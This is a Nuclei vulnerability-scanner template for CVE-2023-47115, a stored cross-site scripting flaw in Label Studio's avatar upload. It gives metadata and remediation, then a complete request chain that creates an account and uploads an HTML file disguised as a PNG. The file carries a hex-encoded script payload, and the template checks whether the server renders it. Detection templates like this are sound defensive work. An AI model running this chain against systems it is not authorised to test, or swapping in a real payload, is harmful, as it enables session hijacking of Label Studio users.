nuclei-templates/http/cves/2023/CVE-2023-47115.yaml

92 lines
3.0 KiB
YAML

id: CVE-2023-47115
info:
name: Label Studio - Stored Cross-Site Scripting
author: isacaya
severity: high
description: |
Versions prior to 1.9.2 have a cross-site scripting (XSS) vulnerability that could be exploited when an authenticated user uploads a crafted image file for their avatar that gets rendered as a HTML file on the website.
impact: |
Executing arbitrary JavaScript could result in an attacker performing malicious actions on Label Studio users if they visit the crafted avatar image.
remediation: |
Update to version 1.9.2.
reference:
- https://nvd.nist.gov/vuln/detail/CVE-2023-47115
- https://github.com/advisories/GHSA-q68h-xwq5-mm7x
- https://docs.djangoproject.com/en/4.2/ref/views/#serving-files-in-development
- https://github.com/HumanSignal/label-studio/blob/1.8.2/label_studio/users/functions.py#L18-L49
- https://github.com/HumanSignal/label-studio/blob/1.8.2/label_studio/users/urls.py#L25-L26
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:L
cvss-score: 7.1
cve-id: CVE-2023-47115
cwe-id: CWE-79
metadata:
verified: true
max-request: 1
shodan-query: http.favicon.hash:-1649949475
tags: cve,cve2023,xss,authenticated,intrusive,label-studio
http:
- raw:
- |
GET /user/login/ HTTP/1.1
Host: {{Hostname}}
- |
POST /user/signup/?&next=/projects/ HTTP/1.1
Host: {{Hostname}}
Content-Type: application/x-www-form-urlencoded
csrfmiddlewaretoken={{csrftoken}}&email={{randstr_1}}%40{{randstr_1}}.{{randstr_1}}&password={{randstr_2}}&allow_newsletters=false
- |
GET /api/current-user/whoami HTTP/1.1
Host: {{Hostname}}
- |
POST /api/users/{{id}}/avatar/ HTTP/1.1
Host: {{Hostname}}
Content-Type: multipart/form-data; boundary=----WebKitFormBoundarytZZRQ9D2LS0PMsHF
------WebKitFormBoundarytZZRQ9D2LS0PMsHF
Content-Disposition: form-data; name="avatar"; filename="nuclei.html"
Content-Type: image/png
{{hex_decode("89504E470D0A1A0A0000000D4948445200000009000000080802000000A4AF42E200000046494441543C7363726970743E616C65727428646F63756D656E742E646F6D61696E293C2F7363726970743E")}}
------WebKitFormBoundarytZZRQ9D2LS0PMsHF
- |
GET /api/current-user/whoami HTTP/1.1
Host: {{Hostname}}
- |
GET {{filename}} HTTP/1.1
Host: {{Hostname}}
extractors:
- type: xpath
name: csrftoken
internal: true
attribute: value
xpath:
- '/html/body/div/form/input'
- type: json
part: body
name: id
internal: true
json:
- '.id'
- type: json
part: body
name: filename
internal: true
json:
- '.avatar'
matchers-condition: and
matchers:
- type: dsl
dsl:
- "contains(header, 'text/html')"
- "status_code == 200"
- 'contains(body, "<script>alert(document.domain)</script>")'
condition: and